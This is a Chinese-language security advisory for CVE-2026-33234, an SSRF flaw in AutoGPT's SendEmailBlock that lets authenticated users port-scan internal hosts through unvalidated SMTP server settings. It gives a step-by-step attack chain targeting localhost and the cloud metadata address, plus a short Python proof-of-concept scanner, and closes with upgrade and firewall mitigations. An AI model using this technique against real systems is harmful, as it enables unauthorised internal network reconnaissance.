CVE-2026-33234 CVSS 5.0 中危

CVE-2026-33234 AutoGPT SendEmailBlock SSRF漏洞致内网扫描

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33234

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AutoGPT

漏洞概述

AutoGPT是一个用于创建、部署和管理AI代理的工作流自动化平台。在0.1.0至0.6.51版本中，SendEmailBlock组件存在安全缺陷，直接使用用户提供的SMTP服务器地址建立连接，绕过了平台的SSRF防护机制。攻击者可利用此漏洞对内部网络进行端口扫描和服务指纹识别。该问题已在0.6.52版本中修复。

技术细节

漏洞位于`autogpt_platform/backend/backend/blocks/email_block.py`文件的`SendEmailBlock`中。该块接受用户输入的`smtp_server`和`smtp_port`，并将其直接传递给Python的`smtplib.SMTP()`以建立原始TCP连接。此过程完全绕过了`backend/util/request.py`中的`validate_url_host()`函数和`BLOCKED_IP_NETWORKS`黑名单，导致本应被阻止的私有IP、回环地址及元数据地址可以被访问。由于`smtplib`会读取目标的TCP Banner并嵌入异常消息，且该消息会作为执行框架的输出返回给用户，经过身份认证的攻击者可以利用此行为执行非盲的内网端口扫描和服务指纹识别。

攻击链分析

STEP 1

1. 获取凭证

攻击者注册或获取AutoGPT平台的低权限用户账户。

STEP 2

2. 构造请求

攻击者创建一个新的工作流或任务，选择SendEmailBlock，并将smtp_server参数设置为内网目标IP（如127.0.0.1或169.254.169.254），smtp_port设置为探测端口。

STEP 3

3. 绕过防护

AutoGPT执行该块时，直接调用smtplib.SMTP()建立连接，绕过了validate_url_host()等SSRF防御检查。

STEP 4

4. 泄露信息

代码尝试建立SMTP连接，若端口开放或服务存在，smtplib会捕获TCP Banner或连接错误，并通过异常消息将指纹信息返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33234
# This script demonstrates the vulnerable behavior of passing arbitrary IPs to smtplib.

import smtplib

def exploit_ssrf(target_ip, target_port):
    try:
        # Simulating the vulnerable SendEmailBlock logic
        print(f"[*] Connecting to {target_ip}:{target_port}...")
        # The vulnerable code calls smtplib.SMTP(user_input_server, user_input_port)
        conn = smtplib.SMTP(target_ip, target_port, timeout=3)
        print(f"[+] Port {target_port} is open on {target_ip}")
        conn.quit()
    except smtplib.SMTPConnectError as e:
        # The exception often contains the server banner, revealing service info
        banner = str(e)
        print(f"[-] Connection failed: {banner}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example: Scanning localhost port 22 (SSH)
    exploit_ssrf("127.0.0.1", 22)

影响范围

AutoGPT 0.1.0 - 0.6.51

防御指南

临时缓解措施

建议立即升级至修复版本。若无法升级，应在网络基础设施层面（如防火墙或安全组）严格限制AutoGPT应用服务器只能访问必要的SMTP服务器，阻止其对内网网段（如127.0.0.0/8, 10.0.0.0/8等）及云元数据IP（如169.254.169.254）的访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表